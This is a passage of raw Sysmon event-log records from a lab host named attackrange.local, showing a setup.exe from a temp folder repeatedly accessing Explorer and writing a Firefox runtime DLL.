ws.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014492Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014491Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014490Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014482Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014481Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\api-ms-win-crt-process-l1-1-0.dll2021-01-18 13:59:52.208 10341000x800000000000000014480Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014479Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014478Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014477Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014476Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014475Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:52.208{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014474Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
